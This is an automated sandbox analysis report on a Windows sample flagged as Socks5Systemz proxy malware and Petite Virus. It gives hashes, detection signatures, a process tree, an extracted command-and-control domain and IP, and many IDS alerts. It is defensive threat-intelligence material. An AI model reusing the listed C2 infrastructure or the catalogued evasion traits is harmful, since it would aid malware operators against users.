
Windows Analysis Report
6hvZpn91O8.exe

Overview

General Information

Sample name: 6hvZpn91O8.exe (renamed because original name is a hash value)
Original sample name: 1015b0b5cfddfbc4baea6910d9c56c3c.exe
Analysis ID: 1575009
MD5: 1015b0b5cfddfbc4baea6910d9c56c3c
SHA1: 9fe1cae9d38a53a1217556c60ffd3c02d8235d66
SHA256: f08f680f17aaf9505a8d53648545ce684af9b39a90a8dc9d2e872693e1d59b45
Tags: exe, Socks5Systemz, user-abuse_ch

Detection

Petite Virus, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 6hvZpn91O8.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\6hvZpn91O8.exe" MD5: 1015B0B5CFDDFBC4BAEA6910D9C56C3C)
    • 6hvZpn91O8.tmp (PID: 3732 cmdline: "C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 4408 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 3616 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
      • net.exe (PID: 4136 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 5740 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 2496 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
  • cleanup
{"C2 list": ["bwiesit.com"]}
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |

Source | Rule | Description | Author | Strings
00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: crtgame.exe PID: 2496 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T03:07:57.978929+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:07:58.608004+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:00.205019+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:01.785416+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:03.392194+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:05.001033+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:06.577197+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.166473+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.772181+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:09.377875+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:10.951577+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:12.526162+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:13.123974+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:14.702136+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:16.282067+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49778 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:17.856916+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49784 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:19.440462+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49790 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.022814+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.623810+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.212063+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.811479+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:25.393608+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49804 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:26.999223+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49809 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:28.580571+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.164823+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.770392+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:32.348769+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:33.923562+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49828 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:35.504852+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49834 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:37.096939+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49839 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:38.687703+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49844 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:40.308518+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49847 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:41.915277+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49852 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:43.485288+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49858 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:45.064366+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49861 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:46.673589+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49865 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.257697+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.858160+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:50.475692+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.087120+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.699334+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:53.287005+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49883 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:54.907769+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49887 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:56.492651+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49893 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:58.069074+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:59.653727+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49899 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:01.288045+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49905 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:02.868923+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49909 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:04.512597+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49913 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:09.445534+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.4 | 49923 | 94.232.249.187 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T03:07:57.978929+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:07:58.608004+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:00.205019+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:01.785416+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:03.392194+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:05.001033+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:06.577197+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.166473+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.772181+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:09.377875+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:10.951577+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:12.526162+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:13.123974+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:14.702136+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:16.282067+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49778 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:17.856916+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49784 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:19.440462+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49790 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.022814+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.623810+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.212063+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.811479+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:25.393608+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49804 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:26.999223+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49809 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:28.580571+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.164823+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.770392+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:32.348769+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:33.923562+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49828 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:35.504852+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49834 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:37.096939+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49839 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:38.687703+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49844 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:40.308518+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49847 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:41.915277+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49852 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:43.485288+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49858 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:45.064366+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49861 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:46.673589+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49865 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.257697+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:48.858160+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:50.475692+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.087120+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:51.699334+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:53.287005+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49883 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:54.907769+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49887 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:56.492651+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49893 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:58.069074+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:59.653727+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49899 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:01.288045+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49905 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:02.868923+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49909 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:04.512597+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49913 | 94.232.249.187 | 80 | TCP
2024-12-14T03:09:09.445534+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.4 | 49923 | 94.232.249.187 | 80 | TCP

AV Detection

Source: 6hvZpn91O8.exe | Avira: detected
Source: crtgame.exe.2496.6.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["bwiesit.com"]}
Source: 6hvZpn91O8.exe | Virustotal: Detection: 57%
Source: 6hvZpn91O8.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

Compliance

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 4.2.crtgame.exe.400000.0.unpack
Source: 6hvZpn91O8.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb | source: is-BJBAO.tmp.1.dr
Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb | source: is-HAM7K.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49759 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49759 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49736 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49736 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49778 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49778 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49741 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49798 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49741 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49765 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49765 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49747 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49753 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49753 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49814 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49814 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49747 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49798 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49819 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49819 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49804 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49771 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49804 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49809 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49771 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49809 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49790 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49784 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49784 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49777 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49883 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49852 -> 94.232.249.187:80
